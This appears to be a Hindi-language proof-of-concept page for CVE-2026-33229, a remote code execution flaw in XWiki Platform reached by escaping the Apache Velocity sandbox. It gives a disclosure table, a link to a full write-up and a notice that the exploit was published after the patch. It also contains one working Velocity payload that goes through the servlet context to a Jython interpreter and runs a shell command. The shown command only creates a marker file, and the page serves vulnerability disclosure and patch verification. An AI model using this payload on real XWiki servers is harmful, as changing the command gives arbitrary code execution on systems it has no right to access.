
# CVE-2026-33229 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Apache Velocity सैंडबॉक्स बायपास के माध्यम से XWiki RCE, तकनीकी विवरण और एक कार्यशील पेलोड के साथ।
XWiki Platform में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता जो स्क्रिप्टिंग अनुमतियों वाले एक प्रमाणित उपयोगकर्ता को Apache Velocity सैंडबॉक्स को पूरी तरह से बाईपास करने की अनुमति देती है — Java Reflection की कोई आवश्यकता नहीं — Velocity संदर्भ में पहले से मौजूद प्री-इंस्टैंशिएटेड ऑब्जेक्ट्स को ट्रैवर्स करके।
📄 पूर्ण तकनीकी विवरण: youssefazefzaf.com/posts/cve
| फ़ील्ड | मान |
|---|
| CVE ID | CVE-2026-33229 |
| प्रभावित उत्पाद | XWiki Platform |
| घटक | Velocity मैक्रो रेंडरर, पेज शीर्षक पैरामीटर |
| आवश्यक विशेषाधिकार | प्रमाणित + स्क्रिप्ट अनुमति |
| प्रभाव | रिमोट कोड एक्ज़ीक्यूशन |
| GHSA | GHSA-h259-74h5-4rh9 |
| खोजा गया | 7 नवंबर 2025 |
| पैच किया गया | 10 दिसंबर 2025 |
| प्रकट किया गया | 8 अप्रैल 2026 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
जिम्मेदार प्रकटीकरण सूचना: PoC पैच उपलब्ध होने के बाद प्रकाशित किया गया। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं।